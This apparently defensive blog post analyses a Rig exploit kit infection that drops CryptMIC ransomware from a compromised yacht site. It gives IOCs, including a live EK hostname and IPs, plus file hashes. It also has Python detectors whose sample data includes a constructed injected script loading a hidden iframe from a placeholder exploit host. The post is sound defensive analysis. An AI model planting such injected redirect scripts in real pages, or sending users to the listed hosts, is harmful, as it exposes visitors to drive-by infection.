Rig EK at 91.121.208.103 Drops CryptMIC

IOCs:

  • 65.254.227.224 – zurnyachts[.]com – Compromised Site
  • 91.121.208.103 – butterteigenpassionisten.loganslittleangels.org – Rig EK
  • 91.121.74.154 – CryptMIC post-infection traffic via TCP port 443

Traffic:

[Image: traffic capture]

Video of Infection:

Sorry in advance if you don’t like my music selection! I will take song requests for $10! 😉

Hashes:

  1. SHA256: 00895735b2297cd73b723f27120bd86c56957e069156050a8eabf3e8a3811fa4
    File name: RigEK Landing Page.html
  2. SHA256: dbb2d959adc4986c43b6e9279d90ceb55a3b1686a0ac229575dc0f8dcac2e26f
    File name: RigEK Flash Exploit.swf
  3. SHA256: e1c7071c4449b043d2d57f6501f463481f79b49e2cc4f75b4df5acf862b03f4d
    File name: radA5147.tmp.exe

Infection Chain:

The infection starts with the user (that would be me) browsing to a compromised website, in this case zurnyachts[.]com (DO NOT GO TO THAT SITE). Injected into the site is a script from the campaign known as “pseudoDarkleech”. The script is easy to spot once you know what to look for: in this example it sat at the very top of the source, above the <html> tag, where nothing belongs in a well-formed page. Here is a picture of the script on the site:

[Image: pseudoDarkleech script injected above the <html> tag of the compromised page]
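A quick check for this kind of injection, written for this post as an added example (it is not the campaign's script and not the author's tooling): it treats any <script> or <iframe> that appears before the page's <!DOCTYPE>/<html> root as out of place and pulls out any URL in that preamble that points off-site, which is where the EK redirect lives. The sample pages, hostnames and paths below are constructed placeholders, not the IOCs from the capture.

```python
import re
from urllib.parse import urlparse

# Injected content precedes the document root in the case above, so the
# check is: anything script- or iframe-like before <!DOCTYPE>/<html> is
# out of place, and any URL in that preamble pointing off-site is the
# candidate EK redirector.
ROOT_RE = re.compile(r"<!doctype\b|<html\b", re.IGNORECASE)
TAG_RE = re.compile(r"<(script|iframe)\b[^>]*>", re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.IGNORECASE)


def preamble(html):
    """Everything before the first <!DOCTYPE> or <html> tag ('' if the root is first)."""
    m = ROOT_RE.search(html)
    return html[:m.start()] if m else html


def scan_page(html, page_host):
    """Report script/iframe tags and off-site URLs that appear before the root."""
    pre = preamble(html)
    tags = [t.group(1).lower() for t in TAG_RE.finditer(pre)]
    urls = URL_RE.findall(pre)
    offsite = [u for u in urls
               if (urlparse(u).hostname or "").lower() != page_host.lower()]
    return {"preamble_tags": tags,
            "offsite_urls": offsite,
            "suspicious": bool(tags)}


# Constructed sample of a compromised page (hostnames are placeholders,
# not the IOCs from the capture): a script that writes a hidden iframe
# sits above the <!DOCTYPE>, exactly where the injection was seen.
INFECTED_PAGE = """<script>
var f = document.createElement("iframe");
f.src = "http://ek-host.example/?q=abc123";
f.style.display = "none";
document.body.appendChild(f);
</script>
<!DOCTYPE html>
<html><head><title>Yachts</title></head>
<body><p>Welcome aboard.</p></body></html>
"""

# Constructed clean page: its only script is inside <html>, so nothing
# precedes the root and it is not flagged.
CLEAN_PAGE = """<!DOCTYPE html>
<html><head><script src="http://cdn.example/site.js"></script></head>
<body><p>Welcome aboard.</p></body></html>
"""

if __name__ == "__main__":
    for name, page in (("infected", INFECTED_PAGE), ("clean", CLEAN_PAGE)):
        print(name, scan_page(page, "compromised-site.example"))
```

The check is deliberately narrow: it only looks at the preamble, so an injection placed inside <body> will not trip it, but anything it does flag is worth a look because a well-formed page has nothing there.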

Once the browser loads the compromised page, the URL inside the pseudoDarkleech iframe triggers a GET request to the Rig Exploit Kit landing page. At this point you’re off to the races. Here is the GET request for that landing page:

[Image: GET request for the Rig EK landing page]

The landing page is obfuscated and encoded, but this is the point at which the browser is instructed to fetch a Flash exploit. Below is the GET request for the Flash exploit:

[Image: GET request for the Rig EK Flash exploit]

If the exploit succeeds, the payload follows. In this instance the executable is dropped into %TEMP%:

[Image: Rig EK payload delivery]

[Image: payload written to %TEMP%]
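To pull the same chain out of proxy logs, the following is an added example (not from the original post and not any vendor's tooling) that classifies each request by host and content type against the IOCs listed at the top and reports, per client, which stages were seen: compromised site, EK landing page, Flash exploit, payload, and the post-infection connection on 443. The log layout, the content types assumed for the .swf and the executable, and the log lines themselves are constructed for the example; only the hostnames and the C2 IP are the post's IOCs.

```python
import re
from urllib.parse import urlparse

# IOCs taken from the list at the top of this post.
COMPROMISED_HOSTS = {"zurnyachts.com"}
EK_HOSTS = {"butterteigenpassionisten.loganslittleangels.org"}
C2_IPS = {"91.121.74.154"}

# Assumed proxy log layout (constructed for this example, not a real
# product's format): time client method url status content-type referer
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "
    r"(?P<status>\d{3}) (?P<ctype>\S+) (?P<referer>\S+)$"
)

# Stage order of the chain described above. The content types used to
# tell the Flash exploit and the executable apart are assumptions.
STAGES = ["compromised_site", "ek_landing", "flash_exploit", "payload", "c2"]


def host_of(rec):
    """Host for a GET/POST URL, or the host part of a CONNECT host:port."""
    if rec["method"] == "CONNECT":
        return rec["url"].rsplit(":", 1)[0]
    return (urlparse(rec["url"]).hostname or "").lower()


def stage_of(rec):
    """Map one parsed request onto a chain stage, or None if it is unrelated."""
    host = host_of(rec)
    ctype = rec["ctype"].lower()
    if host in COMPROMISED_HOSTS:
        return "compromised_site"
    if host in EK_HOSTS:
        if ctype.startswith("text/html"):
            return "ek_landing"
        if ctype == "application/x-shockwave-flash":
            return "flash_exploit"
        if ctype in ("application/x-msdownload", "application/octet-stream"):
            return "payload"
    if host in C2_IPS:
        return "c2"
    return None


def reconstruct(lines):
    """Per client: the chain stages seen, in order of first appearance, and
    whether landing page, exploit and payload were all observed."""
    chains = {}
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        stage = stage_of(rec)
        if stage is None:
            continue
        seen = chains.setdefault(rec["client"], [])
        if stage not in seen:
            seen.append(stage)
    return {
        client: {"stages": seen,
                 "payload_delivered":
                     {"ek_landing", "flash_exploit", "payload"} <= set(seen)}
        for client, seen in chains.items()
    }


# Constructed log lines: client addresses from RFC 5737 test space, paths
# and times invented; the hosts are the IOCs from this post. The second
# client reaches the landing page but never fetches the exploit.
SAMPLE_LOG = """\
14:02:10 192.0.2.10 GET http://zurnyachts.com/ 200 text/html -
14:02:11 192.0.2.10 GET http://butterteigenpassionisten.loganslittleangels.org/?q=placeholder 200 text/html http://zurnyachts.com/
14:02:12 192.0.2.10 GET http://butterteigenpassionisten.loganslittleangels.org/?s=placeholder 200 application/x-shockwave-flash http://butterteigenpassionisten.loganslittleangels.org/
14:02:13 192.0.2.10 GET http://butterteigenpassionisten.loganslittleangels.org/?p=placeholder 200 application/x-msdownload http://butterteigenpassionisten.loganslittleangels.org/
14:02:20 192.0.2.10 CONNECT 91.121.74.154:443 200 - -
14:03:00 192.0.2.11 GET http://zurnyachts.com/ 200 text/html -
14:03:01 192.0.2.11 GET http://butterteigenpassionisten.loganslittleangels.org/?q=placeholder 200 text/html http://zurnyachts.com/
""".splitlines()

if __name__ == "__main__":
    for client, info in reconstruct(SAMPLE_LOG).items():
        print(client, info)
```

A client that reaches the payload stage warrants a look at %TEMP% on the host whether or not the 443 connection to the C2 address follows, since in this capture the payload ran and dropped ransom notes even though encryption itself failed.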

In the video you can see the executable being preceded by a .js file. You can also see me trying to quickly copy it for fun, but I failed to do so before it deleted itself.

I also want to mention that even though the payload was delivered to the host, there seems to have been an error: somewhere along the way it failed to encrypt my files. In any case, you can see the ransom notes being dropped in %TEMP% and on the Desktop.

My recommendation would be to block the compromised website (for maybe a month, or until it gets cleaned) and the Rig EK IP on enterprise networks.
